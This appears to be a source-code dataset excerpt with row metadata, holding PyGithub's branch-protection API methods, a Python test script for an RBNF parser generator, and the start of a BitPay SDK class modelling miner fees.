        ), require_code_owner_reviews
        assert (
            required_approving_review_count is github.GithubObject.NotSet
            or isinstance(required_approving_review_count, int)
        ), (required_approving_review_count)
        post_parameters = {}
        # strict/contexts must be submitted together; default whichever of
        # the two the caller omitted. Omitting both clears the requirement.
        if (
            strict is not github.GithubObject.NotSet
            or contexts is not github.GithubObject.NotSet
        ):
            if strict is github.GithubObject.NotSet:
                strict = False
            if contexts is github.GithubObject.NotSet:
                contexts = []
            post_parameters["required_status_checks"] = {
                "strict": strict,
                "contexts": contexts,
            }
        else:
            post_parameters["required_status_checks"] = None
        if enforce_admins is not github.GithubObject.NotSet:
            post_parameters["enforce_admins"] = enforce_admins
        else:
            post_parameters["enforce_admins"] = None
        # Any review-related argument enables the review requirement; sending
        # None removes it entirely.
        if (
            dismissal_users is not github.GithubObject.NotSet
            or dismissal_teams is not github.GithubObject.NotSet
            or dismiss_stale_reviews is not github.GithubObject.NotSet
            or require_code_owner_reviews is not github.GithubObject.NotSet
            or required_approving_review_count is not github.GithubObject.NotSet
        ):
            post_parameters["required_pull_request_reviews"] = {}
            if dismiss_stale_reviews is not github.GithubObject.NotSet:
                post_parameters["required_pull_request_reviews"][
                    "dismiss_stale_reviews"
                ] = dismiss_stale_reviews
            if require_code_owner_reviews is not github.GithubObject.NotSet:
                post_parameters["required_pull_request_reviews"][
                    "require_code_owner_reviews"
                ] = require_code_owner_reviews
            if required_approving_review_count is not github.GithubObject.NotSet:
                post_parameters["required_pull_request_reviews"][
                    "required_approving_review_count"
                ] = required_approving_review_count
            if dismissal_users is not github.GithubObject.NotSet:
                post_parameters["required_pull_request_reviews"][
                    "dismissal_restrictions"
                ] = {"users": dismissal_users}
            if dismissal_teams is not github.GithubObject.NotSet:
                if (
                    "dismissal_restrictions"
                    not in post_parameters["required_pull_request_reviews"]
                ):
                    post_parameters["required_pull_request_reviews"][
                        "dismissal_restrictions"
                    ] = {}
                post_parameters["required_pull_request_reviews"][
                    "dismissal_restrictions"
                ]["teams"] = dismissal_teams
        else:
            post_parameters["required_pull_request_reviews"] = None
        # user/team push restrictions are likewise submitted together;
        # omitting both sends None, which removes the restrictions.
        if (
            user_push_restrictions is not github.GithubObject.NotSet
            or team_push_restrictions is not github.GithubObject.NotSet
        ):
            if user_push_restrictions is github.GithubObject.NotSet:
                user_push_restrictions = []
            if team_push_restrictions is github.GithubObject.NotSet:
                team_push_restrictions = []
            post_parameters["restrictions"] = {
                "users": user_push_restrictions,
                "teams": team_push_restrictions,
            }
        else:
            post_parameters["restrictions"] = None
        headers, data = self._requester.requestJsonAndCheck(
            "PUT",
            self.protection_url,
            headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
            input=post_parameters,
        )
    def remove_protection(self):
        """
        :calls: `DELETE /repos/:owner/:repo/branches/:branch/protection <https://developer.github.com/v3/repos/branches>`_
        """
        headers, data = self._requester.requestJsonAndCheck(
            "DELETE",
            self.protection_url,
        )
    def get_required_status_checks(self):
        """
        :calls: `GET /repos/:owner/:repo/branches/:branch/protection/required_status_checks <https://developer.github.com/v3/repos/branches>`_
        :rtype: :class:`github.RequiredStatusChecks.RequiredStatusChecks`
        """
        headers, data = self._requester.requestJsonAndCheck(
            "GET", self.protection_url + "/required_status_checks"
        )
        return github.RequiredStatusChecks.RequiredStatusChecks(
            self._requester, headers, data, completed=True
        )
    def edit_required_status_checks(
        self, strict=github.GithubObject.NotSet, contexts=github.GithubObject.NotSet
    ):
        """
        :calls: `PATCH /repos/:owner/:repo/branches/:branch/protection/required_status_checks <https://developer.github.com/v3/repos/branches>`_
        :strict: bool
        :contexts: list of strings
        """
        assert strict is github.GithubObject.NotSet or isinstance(strict, bool), strict
        assert contexts is github.GithubObject.NotSet or all(
            isinstance(element, str) for element in contexts
        ), contexts
        post_parameters = {}
        if strict is not github.GithubObject.NotSet:
            post_parameters["strict"] = strict
        if contexts is not github.GithubObject.NotSet:
            post_parameters["contexts"] = contexts
        headers, data = self._requester.requestJsonAndCheck(
            "PATCH",
            self.protection_url + "/required_status_checks",
            input=post_parameters,
        )
    def remove_required_status_checks(self):
        """
        :calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/required_status_checks <https://developer.github.com/v3/repos/branches>`_
        """
        headers, data = self._requester.requestJsonAndCheck(
            "DELETE", self.protection_url + "/required_status_checks"
        )
    def get_required_pull_request_reviews(self):
        """
        :calls: `GET /repos/:owner/:repo/branches/:branch/protection/required_pull_request_reviews <https://developer.github.com/v3/repos/branches>`_
        :rtype: :class:`github.RequiredPullRequestReviews.RequiredPullRequestReviews`
        """
        headers, data = self._requester.requestJsonAndCheck(
            "GET",
            self.protection_url + "/required_pull_request_reviews",
            headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
        )
        return github.RequiredPullRequestReviews.RequiredPullRequestReviews(
            self._requester, headers, data, completed=True
        )
    def edit_required_pull_request_reviews(
        self,
        dismissal_users=github.GithubObject.NotSet,
        dismissal_teams=github.GithubObject.NotSet,
        dismiss_stale_reviews=github.GithubObject.NotSet,
        require_code_owner_reviews=github.GithubObject.NotSet,
        required_approving_review_count=github.GithubObject.NotSet,
    ):
        """
        :calls: `PATCH /repos/:owner/:repo/branches/:branch/protection/required_pull_request_reviews <https://developer.github.com/v3/repos/branches>`_
        :dismissal_users: list of strings
        :dismissal_teams: list of strings
        :dismiss_stale_reviews: bool
        :require_code_owner_reviews: bool
        :required_approving_review_count: int
        """
        assert dismissal_users is github.GithubObject.NotSet or all(
            isinstance(element, str) for element in dismissal_users
        ), dismissal_users
        assert dismissal_teams is github.GithubObject.NotSet or all(
            isinstance(element, str) for element in dismissal_teams
        ), dismissal_teams
        assert dismiss_stale_reviews is github.GithubObject.NotSet or isinstance(
            dismiss_stale_reviews, bool
        ), dismiss_stale_reviews
        assert require_code_owner_reviews is github.GithubObject.NotSet or isinstance(
            require_code_owner_reviews, bool
        ), require_code_owner_reviews
        assert (
            required_approving_review_count is github.GithubObject.NotSet
            or isinstance(required_approving_review_count, int)
        ), (required_approving_review_count)
        # Only arguments the caller actually supplied are PATCHed; the rest
        # keep their current server-side values.
        post_parameters = {}
        if dismissal_users is not github.GithubObject.NotSet:
            post_parameters["dismissal_restrictions"] = {"users": dismissal_users}
        if dismissal_teams is not github.GithubObject.NotSet:
            if "dismissal_restrictions" not in post_parameters:
                post_parameters["dismissal_restrictions"] = {}
            post_parameters["dismissal_restrictions"]["teams"] = dismissal_teams
        if dismiss_stale_reviews is not github.GithubObject.NotSet:
            post_parameters["dismiss_stale_reviews"] = dismiss_stale_reviews
        if require_code_owner_reviews is not github.GithubObject.NotSet:
            post_parameters["require_code_owner_reviews"] = require_code_owner_reviews
        if required_approving_review_count is not github.GithubObject.NotSet:
            post_parameters[
                "required_approving_review_count"
            ] = required_approving_review_count
        headers, data = self._requester.requestJsonAndCheck(
            "PATCH",
            self.protection_url + "/required_pull_request_reviews",
            headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
            input=post_parameters,
        )
    def remove_required_pull_request_reviews(self):
        """
        :calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/required_pull_request_reviews <https://developer.github.com/v3/repos/branches>`_
        """
        headers, data = self._requester.requestJsonAndCheck(
            "DELETE", self.protection_url + "/required_pull_request_reviews"
        )
    def get_admin_enforcement(self):
        """
        :calls: `GET /repos/:owner/:repo/branches/:branch/protection/enforce_admins <https://developer.github.com/v3/repos/branches>`_
        :rtype: bool
        """
        headers, data = self._requester.requestJsonAndCheck(
            "GET", self.protection_url + "/enforce_admins"
        )
        return data["enabled"]
    def set_admin_enforcement(self):
        """
        :calls: `POST /repos/:owner/:repo/branches/:branch/protection/enforce_admins <https://developer.github.com/v3/repos/branches>`_
        """
        headers, data = self._requester.requestJsonAndCheck(
            "POST", self.protection_url + "/enforce_admins"
        )
    def remove_admin_enforcement(self):
        """
        :calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/enforce_admins <https://developer.github.com/v3/repos/branches>`_
        """
        headers, data = self._requester.requestJsonAndCheck(
            "DELETE", self.protection_url + "/enforce_admins"
        )
    def get_user_push_restrictions(self):
        """
        :calls: `GET /repos/:owner/:repo/branches/:branch/protection/restrictions/users <https://developer.github.com/v3/repos/branches>`_
        :rtype: :class:`github.PaginatedList.PaginatedList` of :class:`github.NamedUser.NamedUser`
        """
        return github.PaginatedList.PaginatedList(
            github.NamedUser.NamedUser,
            self._requester,
            self.protection_url + "/restrictions/users",
            None,
        )
    def get_team_push_restrictions(self):
        """
        :calls: `GET /repos/:owner/:repo/branches/:branch/protection/restrictions/teams <https://developer.github.com/v3/repos/branches>`_
        :rtype: :class:`github.PaginatedList.PaginatedList` of :class:`github.Team.Team`
        """
        return github.PaginatedList.PaginatedList(
            github.Team.Team,
            self._requester,
            self.protection_url + "/restrictions/teams",
            None,
        )
    def add_user_push_restrictions(self, *users):
        """
        :calls: `POST /repos/:owner/:repo/branches/:branch/protection/restrictions/users <https://developer.github.com/v3/repos/branches>`_
        :users: list of strings (user names)
        """
        assert all(isinstance(element, str) for element in users), users
        headers, data = self._requester.requestJsonAndCheck(
            "POST", self.protection_url + "/restrictions/users", input=users
        )
    def replace_user_push_restrictions(self, *users):
        """
        :calls: `PUT /repos/:owner/:repo/branches/:branch/protection/restrictions/users <https://developer.github.com/v3/repos/branches>`_
        :users: list of strings (user names)
        """
        assert all(isinstance(element, str) for element in users), users
        headers, data = self._requester.requestJsonAndCheck(
            "PUT", self.protection_url + "/restrictions/users", input=users
        )
    def remove_user_push_restrictions(self, *users):
        """
        :calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/restrictions/users <https://developer.github.com/v3/repos/branches>`_
        :users: list of strings (user names)
        """
        assert all(isinstance(element, str) for element in users), users
        headers, data = self._requester.requestJsonAndCheck(
            "DELETE", self.protection_url + "/restrictions/users", input=users
        )
    def add_team_push_restrictions(self, *teams):
        """
        :calls: `POST /repos/:owner/:repo/branches/:branch/protection/restrictions/teams <https://developer.github.com/v3/repos/branches>`_
        :teams: list of strings (team slugs)
        """
        assert all(isinstance(element, str) for element in teams), teams
        headers, data = self._requester.requestJsonAndCheck(
            "POST", self.protection_url + "/restrictions/teams", input=teams
        )
    def replace_team_push_restrictions(self, *teams):
        """
        :calls: `PUT /repos/:owner/:repo/branches/:branch/protection/restrictions/teams <https://developer.github.com/v3/repos/branches>`_
        :teams: list of strings (team slugs)
        """
        assert all(isinstance(element, str) for element in teams), teams
        headers, data = self._requester.requestJsonAndCheck(
            "PUT", self.protection_url + "/restrictions/teams", input=teams
        )
    def remove_team_push_restrictions(self, *teams):
        """
        :calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/restrictions/teams <https://developer.github.com/v3/repos/branches>`_
        :teams: list of strings (team slugs)
        """
        assert all(isinstance(element, str) for element in teams), teams
        headers, data = self._requester.requestJsonAndCheck(
            "DELETE", self.protection_url + "/restrictions/teams", input=teams
        )
    def remove_push_restrictions(self):
        """
        :calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/restrictions <https://developer.github.com/v3/repos/branches>`_
        """
        headers, data = self._requester.requestJsonAndCheck(
            "DELETE", self.protection_url + "/restrictions"
        )
    def get_required_signatures(self):
        """
        :calls: `GET /repos/:owner/:repo/branches/:branch/protection/required_signatures <https://developer.github.com/v3/repos/branches>`
        :rtype: bool
        """
        headers, data = self._requester.requestJsonAndCheck(
            "GET",
            self.protection_url + "/required_signatures",
            headers={"Accept": Consts.signaturesProtectedBranchesPreview},
        )
        return data["enabled"]
    def add_required_signatures(self):
        """
        :calls: `POST /repos/:owner/:repo/branches/:branch/protection/required_signatures <https://developer.github.com/v3/repos/branches>`
        """
        headers, data = self._requester.requestJsonAndCheck(
            "POST",
            self.protection_url + "/required_signatures",
            headers={"Accept": Consts.signaturesProtectedBranchesPreview},
        )
    def remove_required_signatures(self):
        """
        :calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/required_signatures <https://developer.github.com/v3/repos/branches>`
        """
        headers, data = self._requester.requestJsonAndCheck(
            "DELETE",
            self.protection_url + "/required_signatures",
            headers={"Accept": Consts.signaturesProtectedBranchesPreview},
        )
| 45.064151 | 152 | 0.624058 | not github.GithubObject.NotSet:
post_parameters["required_pull_request_reviews"][
"required_approving_review_count"
] = required_approving_review_count
if dismissal_users is not github.GithubObject.NotSet:
post_parameters["required_pull_request_reviews"][
"dismissal_restrictions"
] = {"users": dismissal_users}
if dismissal_teams is not github.GithubObject.NotSet:
if (
"dismissal_restrictions"
not in post_parameters["required_pull_request_reviews"]
):
post_parameters["required_pull_request_reviews"][
"dismissal_restrictions"
] = {}
post_parameters["required_pull_request_reviews"][
"dismissal_restrictions"
]["teams"] = dismissal_teams
else:
post_parameters["required_pull_request_reviews"] = None
if (
user_push_restrictions is not github.GithubObject.NotSet
or team_push_restrictions is not github.GithubObject.NotSet
):
if user_push_restrictions is github.GithubObject.NotSet:
user_push_restrictions = []
if team_push_restrictions is github.GithubObject.NotSet:
team_push_restrictions = []
post_parameters["restrictions"] = {
"users": user_push_restrictions,
"teams": team_push_restrictions,
}
else:
post_parameters["restrictions"] = None
headers, data = self._requester.requestJsonAndCheck(
"PUT",
self.protection_url,
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
input=post_parameters,
)
def remove_protection(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE",
self.protection_url,
)
def get_required_status_checks(self):
headers, data = self._requester.requestJsonAndCheck(
"GET", self.protection_url + "/required_status_checks"
)
return github.RequiredStatusChecks.RequiredStatusChecks(
self._requester, headers, data, completed=True
)
def edit_required_status_checks(
self, strict=github.GithubObject.NotSet, contexts=github.GithubObject.NotSet
):
assert strict is github.GithubObject.NotSet or isinstance(strict, bool), strict
assert contexts is github.GithubObject.NotSet or all(
isinstance(element, str) for element in contexts
), contexts
post_parameters = {}
if strict is not github.GithubObject.NotSet:
post_parameters["strict"] = strict
if contexts is not github.GithubObject.NotSet:
post_parameters["contexts"] = contexts
headers, data = self._requester.requestJsonAndCheck(
"PATCH",
self.protection_url + "/required_status_checks",
input=post_parameters,
)
def remove_required_status_checks(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/required_status_checks"
)
def get_required_pull_request_reviews(self):
headers, data = self._requester.requestJsonAndCheck(
"GET",
self.protection_url + "/required_pull_request_reviews",
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
)
return github.RequiredPullRequestReviews.RequiredPullRequestReviews(
self._requester, headers, data, completed=True
)
def edit_required_pull_request_reviews(
self,
dismissal_users=github.GithubObject.NotSet,
dismissal_teams=github.GithubObject.NotSet,
dismiss_stale_reviews=github.GithubObject.NotSet,
require_code_owner_reviews=github.GithubObject.NotSet,
required_approving_review_count=github.GithubObject.NotSet,
):
assert dismissal_users is github.GithubObject.NotSet or all(
isinstance(element, str) for element in dismissal_users
), dismissal_users
assert dismissal_teams is github.GithubObject.NotSet or all(
isinstance(element, str) for element in dismissal_teams
), dismissal_teams
assert dismiss_stale_reviews is github.GithubObject.NotSet or isinstance(
dismiss_stale_reviews, bool
), dismiss_stale_reviews
assert require_code_owner_reviews is github.GithubObject.NotSet or isinstance(
require_code_owner_reviews, bool
), require_code_owner_reviews
assert (
required_approving_review_count is github.GithubObject.NotSet
or isinstance(required_approving_review_count, int)
), (required_approving_review_count)
post_parameters = {}
if dismissal_users is not github.GithubObject.NotSet:
post_parameters["dismissal_restrictions"] = {"users": dismissal_users}
if dismissal_teams is not github.GithubObject.NotSet:
if "dismissal_restrictions" not in post_parameters:
post_parameters["dismissal_restrictions"] = {}
post_parameters["dismissal_restrictions"]["teams"] = dismissal_teams
if dismiss_stale_reviews is not github.GithubObject.NotSet:
post_parameters["dismiss_stale_reviews"] = dismiss_stale_reviews
if require_code_owner_reviews is not github.GithubObject.NotSet:
post_parameters["require_code_owner_reviews"] = require_code_owner_reviews
if required_approving_review_count is not github.GithubObject.NotSet:
post_parameters[
"required_approving_review_count"
] = required_approving_review_count
headers, data = self._requester.requestJsonAndCheck(
"PATCH",
self.protection_url + "/required_pull_request_reviews",
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
input=post_parameters,
)
def remove_required_pull_request_reviews(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/required_pull_request_reviews"
)
def get_admin_enforcement(self):
headers, data = self._requester.requestJsonAndCheck(
"GET", self.protection_url + "/enforce_admins"
)
return data["enabled"]
def set_admin_enforcement(self):
headers, data = self._requester.requestJsonAndCheck(
"POST", self.protection_url + "/enforce_admins"
)
def remove_admin_enforcement(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/enforce_admins"
)
def get_user_push_restrictions(self):
return github.PaginatedList.PaginatedList(
github.NamedUser.NamedUser,
self._requester,
self.protection_url + "/restrictions/users",
None,
)
def get_team_push_restrictions(self):
return github.PaginatedList.PaginatedList(
github.Team.Team,
self._requester,
self.protection_url + "/restrictions/teams",
None,
)
def add_user_push_restrictions(self, *users):
assert all(isinstance(element, str) for element in users), users
headers, data = self._requester.requestJsonAndCheck(
"POST", self.protection_url + "/restrictions/users", input=users
)
def replace_user_push_restrictions(self, *users):
assert all(isinstance(element, str) for element in users), users
headers, data = self._requester.requestJsonAndCheck(
"PUT", self.protection_url + "/restrictions/users", input=users
)
def remove_user_push_restrictions(self, *users):
assert all(isinstance(element, str) for element in users), users
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/restrictions/users", input=users
)
def add_team_push_restrictions(self, *teams):
assert all(isinstance(element, str) for element in teams), teams
headers, data = self._requester.requestJsonAndCheck(
"POST", self.protection_url + "/restrictions/teams", input=teams
)
def replace_team_push_restrictions(self, *teams):
assert all(isinstance(element, str) for element in teams), teams
headers, data = self._requester.requestJsonAndCheck(
"PUT", self.protection_url + "/restrictions/teams", input=teams
)
def remove_team_push_restrictions(self, *teams):
assert all(isinstance(element, str) for element in teams), teams
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/restrictions/teams", input=teams
)
def remove_push_restrictions(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/restrictions"
)
def get_required_signatures(self):
headers, data = self._requester.requestJsonAndCheck(
"GET",
self.protection_url + "/required_signatures",
headers={"Accept": Consts.signaturesProtectedBranchesPreview},
)
return data["enabled"]
def add_required_signatures(self):
headers, data = self._requester.requestJsonAndCheck(
"POST",
self.protection_url + "/required_signatures",
headers={"Accept": Consts.signaturesProtectedBranchesPreview},
)
def remove_required_signatures(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE",
self.protection_url + "/required_signatures",
headers={"Accept": Consts.signaturesProtectedBranchesPreview},
)
| true | true |
f72330d9504ba308986c3e2411b493ad3990f2b7 | 4,451 | py | Python | test/test.py | thautwarm/RBNF.hs | c95838e68d5121b9e9661cc726cd1752345b3f53 | [
"BSD-3-Clause"
] | 7 | 2019-03-01T16:02:05.000Z | 2022-01-18T09:56:23.000Z | test/test.py | thautwarm/RBNF.hs | c95838e68d5121b9e9661cc726cd1752345b3f53 | [
"BSD-3-Clause"
] | 5 | 2019-07-12T08:59:46.000Z | 2020-01-08T14:50:01.000Z | test/test.py | thautwarm/RBNF.hs | c95838e68d5121b9e9661cc726cd1752345b3f53 | [
"BSD-3-Clause"
] | null | null | null | import sys
import operator
from dataclasses import dataclass
from collections import OrderedDict
from typing import Generic, TypeVar
T = TypeVar('T')
nil = None
class Nil:
def __init__(self):
global nil
if nil is None:
nil = self
return
raise ValueError("Nil cannot get instantiated twice.")
def __len__(self):
return 0
def __getitem__(self, n):
raise IndexError('Out of bounds')
@property
def head(self):
raise IndexError('Out of bounds')
@property
def tail(self):
raise IndexError('Out of bounds')
def __repr__(self):
return "[]"
Nil()
class Cons:
def __init__(self, _head, _tail):
self.head = _head
self.tail = _tail
def __len__(self):
_nil = nil
l = 0
while self is not _nil:
l += 1
self = self.tail
return l
def __iter__(self):
_nil = nil
while self is not _nil:
yield self.head
self = self.tail
def __getitem__(self, n):
while n != 0:
self = self.tail
return self.head
def __repr__(self):
return repr(list(self))
# ast=. {}
# linkedlist=a. {}
# tokens=. {offset:int}
# prim__eq::forall a. (a * a) -> bool
# prim__not__eq::forall a. (a * a) -> bool
# prim__null::forall a. a
# prim__peekable::(tokens * int) -> bool
# prim__peek::(tokens * int) -> token
# prim__match__tk::(tokens * int) -> ast
# prim__tk__id::str -> int
# prim__reset::(tokens * int) -> ()
# prim__cons::forall a. (a * linkedlist a) -> linkedlist a
# prim__nil::forall a. linkedlist a
# prim__to__errs::any -> linkedlist (int * str)
# prim__to__result::any -> ast
# prim__to__any::forall a. a -> any
# prim__mk__ast::forall a. (str * a) -> ast
# prim__is__null::forall a. a -> bool
# always__true::State -> bool
@dataclass
class Token:
idint: int
prim__eq = operator.eq
prim__not__eq = operator.ne
prim__null = None
def prim__peekable(tokens, i):
return len(tokens.array) > tokens.offset + i
def prim__peek(tokens, i):
return tokens.array[tokens.offset + i]
def prim__match__tk(tokens, idint):
# print(tokens.offset)
try:
tk = tokens.array[tokens.offset]
except IndexError:
return None
if tk.idint is idint:
tokens.offset += 1
return tk
class Count(OrderedDict):
def __missing__(self, k):
v = self[k] = len(self)
return v
token_cnt = Count()
def prim__tk__id(s):
return token_cnt[s]
def prim__reset(tokens, i):
tokens.offset = i
prim__cons = Cons
prim__nil = nil
def prim__to__result(x):
return x
def prim__to__any(x): return x
@dataclass
class AST(Generic[T]):
tag: str
content: T
def prim__mk__ast(s, x): return AST(s, x)
def prim__is__null(x): return x is None
def prim__is__not__null(x): return x is not None
def always__true(s): return True
class Tokens:
def __init__(self, array):
self.array = array
self.offset = 0
with open("./gen.py") as f:
exec(f.read(), globals())
bT = Token(token_cnt["b"])
tokens = Tokens([bT] * 4)
assert parse_B(None, tokens) == AST(
tag='B',
content=(
(AST(
tag='B',
content=(
(AST(tag='B',
content=((
AST(tag='B',
content=(Token(idint=0),)),
Token(idint=0)),)),
Token(idint=0)),)),
Token(idint=0)),))
@dataclass
class Mul:
lhs: object
op: object
rhs: object
one = 1
zero = 0
add = operator.add
with open("./gen2.py") as f:
exec(f.read(), globals())
number = Token(token_cnt["number"])
lp = Token(token_cnt["quote ("])
rp = Token(token_cnt["quote )"])
mult = Token(token_cnt["quote *"])
div = Token(token_cnt["quote /"])
tokens = Tokens([
number, mult, number, mult,
lp,
number, mult, number, mult, number,
rp
])
assert parse_Mul(None, tokens) == (True, 5)
tokens = Tokens([
number
])
# print(token_cnt)
assert parse_Mul(None, tokens) == (True, 1)
# True,
# Mul(lhs=Token(idint=1),
# op=Token(idint=5),
# rhs=Mul(
# lhs=Mul(
# lhs=Token(idint=1),
# op=Token(
# idint=4),
# rhs=Token(idint=1)),
# op=Token(idint=5),
# rhs=Token(idint=1)))
# )
| 18.316872 | 62 | 0.571332 | import sys
import operator
from dataclasses import dataclass
from collections import OrderedDict
from typing import Generic, TypeVar
T = TypeVar('T')
nil = None
class Nil:
def __init__(self):
global nil
if nil is None:
nil = self
return
raise ValueError("Nil cannot get instantiated twice.")
def __len__(self):
return 0
def __getitem__(self, n):
raise IndexError('Out of bounds')
@property
def head(self):
raise IndexError('Out of bounds')
@property
def tail(self):
raise IndexError('Out of bounds')
def __repr__(self):
return "[]"
Nil()
class Cons:
def __init__(self, _head, _tail):
self.head = _head
self.tail = _tail
def __len__(self):
_nil = nil
l = 0
while self is not _nil:
l += 1
self = self.tail
return l
def __iter__(self):
_nil = nil
while self is not _nil:
yield self.head
self = self.tail
def __getitem__(self, n):
while n != 0:
self = self.tail
return self.head
def __repr__(self):
return repr(list(self))
@dataclass
class Token:
idint: int
prim__eq = operator.eq
prim__not__eq = operator.ne
prim__null = None
def prim__peekable(tokens, i):
return len(tokens.array) > tokens.offset + i
def prim__peek(tokens, i):
return tokens.array[tokens.offset + i]
def prim__match__tk(tokens, idint):
try:
tk = tokens.array[tokens.offset]
except IndexError:
return None
if tk.idint is idint:
tokens.offset += 1
return tk
class Count(OrderedDict):
def __missing__(self, k):
v = self[k] = len(self)
return v
token_cnt = Count()
def prim__tk__id(s):
return token_cnt[s]
def prim__reset(tokens, i):
tokens.offset = i
prim__cons = Cons
prim__nil = nil
def prim__to__result(x):
return x
def prim__to__any(x): return x
@dataclass
class AST(Generic[T]):
tag: str
content: T
def prim__mk__ast(s, x): return AST(s, x)
def prim__is__null(x): return x is None
def prim__is__not__null(x): return x is not None
def always__true(s): return True
class Tokens:
def __init__(self, array):
self.array = array
self.offset = 0
with open("./gen.py") as f:
exec(f.read(), globals())
bT = Token(token_cnt["b"])
tokens = Tokens([bT] * 4)
assert parse_B(None, tokens) == AST(
tag='B',
content=(
(AST(
tag='B',
content=(
(AST(tag='B',
content=((
AST(tag='B',
content=(Token(idint=0),)),
Token(idint=0)),)),
Token(idint=0)),)),
Token(idint=0)),))
@dataclass
class Mul:
lhs: object
op: object
rhs: object
one = 1
zero = 0
add = operator.add
with open("./gen2.py") as f:
exec(f.read(), globals())
number = Token(token_cnt["number"])
lp = Token(token_cnt["quote ("])
rp = Token(token_cnt["quote )"])
mult = Token(token_cnt["quote *"])
div = Token(token_cnt["quote /"])
tokens = Tokens([
number, mult, number, mult,
lp,
number, mult, number, mult, number,
rp
])
assert parse_Mul(None, tokens) == (True, 5)
tokens = Tokens([
number
])
assert parse_Mul(None, tokens) == (True, 1)
| true | true |
f72331a544aca9c9ac8a9380791189cd9025588f | 4,349 | py | Python | src/bitpay/models/invoice/miner_fees.py | ppatidar2021/python-bitpay-client | b0bd6ef6f2ce2950fb42e6583113e225639a4340 | [
"MIT"
] | 3 | 2022-01-24T17:02:22.000Z | 2022-03-10T00:57:20.000Z | src/bitpay/models/invoice/miner_fees.py | ppatidar2021/python-bitpay-client | b0bd6ef6f2ce2950fb42e6583113e225639a4340 | [
"MIT"
] | 1 | 2022-03-08T03:11:09.000Z | 2022-03-09T12:51:13.000Z | src/bitpay/models/invoice/miner_fees.py | ppatidar2021/python-bitpay-client | b0bd6ef6f2ce2950fb42e6583113e225639a4340 | [
"MIT"
] | 3 | 2021-12-24T05:57:33.000Z | 2022-03-14T09:17:40.000Z | """
MinerFees
"""
from .miner_fees_item import MinerFeesItem
class MinerFees:
"""
The total amount of fees that the purchaser will pay to cover BitPay's
UTXO sweep cost for an invoice. The key is the currency and the value
is an amount in satoshis. This is referenced as "Network Cost" on an
invoice,see this support article for more information
"""
__btc = MinerFeesItem()
__bch = MinerFeesItem()
__eth = MinerFeesItem()
__usdc = MinerFeesItem()
__gusd = MinerFeesItem()
__pax = MinerFeesItem()
__doge = MinerFeesItem()
__ltc = MinerFeesItem()
__busd = MinerFeesItem()
__xrp = MinerFeesItem()
def __init__(self, **kwargs):
for key, value in kwargs.items():
try:
if key in ["BTC", "BCH", "ETH", "USDC", "GUSD", "PAX", "BUSD", "XRP"]:
value = MinerFeesItem(**value)
getattr(self, "set_%s" % key.lower())(value)
except AttributeError:
pass
def get_btc(self):
"""
Get method for the btc
:return: btc
"""
return self.__btc
def set_btc(self, btc: MinerFeesItem):
"""
Set method for the btc
:param btc: btc
"""
self.__btc = btc
def get_bch(self):
"""
Get method for the bch
:return: bch
"""
return self.__bch
def set_bch(self, bch: MinerFeesItem):
"""
Set method for the bch
:param bch: bch
"""
self.__bch = bch
def get_eth(self):
"""
Get method for the eth
:return: eth
"""
return self.__eth
def set_eth(self, eth: MinerFeesItem):
"""
Set method for the eth
:param eth: eth
"""
self.__eth = eth
def get_usdc(self):
"""
Get method for the usdc
:return: usdc
"""
return self.__usdc
def set_usdc(self, usdc: MinerFeesItem):
"""
Set method for the usdc
:param usdc: usdc
"""
self.__usdc = usdc
def get_gusd(self):
"""
Get method for the gusd
:return: gusd
"""
return self.__gusd
def set_gusd(self, gusd: MinerFeesItem):
"""
Set method for the gusd
:param gusd: gusd
"""
self.__gusd = gusd
def get_doge(self):
"""
Get method for the doge
:return: doge
"""
return self.__doge
def set_doge(self, doge: MinerFeesItem):
"""
Set method for the doge
:param doge: doge
"""
self.__doge = doge
def get_ltc(self):
"""
Get method for the ltc
:return: ltc
"""
return self.__ltc
def set_ltc(self, ltc: MinerFeesItem):
"""
Set method for the ltc
:param ltc: ltc
"""
self.__ltc = ltc
def get_pax(self):
"""
Get method for the pax
:return: pax
"""
return self.__pax
def set_pax(self, pax: MinerFeesItem):
"""
Set method for the pax
:param pax: pax
"""
self.__pax = pax
def get_busd(self):
"""
Get method for the busd
:return: busd
"""
return self.__busd
def set_busd(self, busd: MinerFeesItem):
"""
Set method for the busd
:param busd: busd
"""
self.__busd = busd
def get_xrp(self):
"""
Get method for the xrp
:return: xrp
"""
return self.__xrp
def set_xrp(self, xrp: MinerFeesItem):
"""
Set method for the xrp
:param xrp: xrp
"""
self.__xrp = xrp
def to_json(self):
"""
:return: data in json
"""
data = {
"btc": self.get_btc(),
"bch": self.get_bch(),
"eth": self.get_eth(),
"usdc": self.get_usdc(),
"gusd": self.get_gusd(),
"pax": self.get_pax(),
"doge": self.get_doge(),
"ltc": self.get_ltc(),
"xrp": self.get_xrp(),
"busd": self.get_busd(),
}
data = {key: value for key, value in data.items() if value}
return data
| 22.417526 | 86 | 0.496896 | from .miner_fees_item import MinerFeesItem
class MinerFees:
__btc = MinerFeesItem()
__bch = MinerFeesItem()
__eth = MinerFeesItem()
__usdc = MinerFeesItem()
__gusd = MinerFeesItem()
__pax = MinerFeesItem()
__doge = MinerFeesItem()
__ltc = MinerFeesItem()
__busd = MinerFeesItem()
__xrp = MinerFeesItem()
def __init__(self, **kwargs):
for key, value in kwargs.items():
try:
if key in ["BTC", "BCH", "ETH", "USDC", "GUSD", "PAX", "BUSD", "XRP"]:
value = MinerFeesItem(**value)
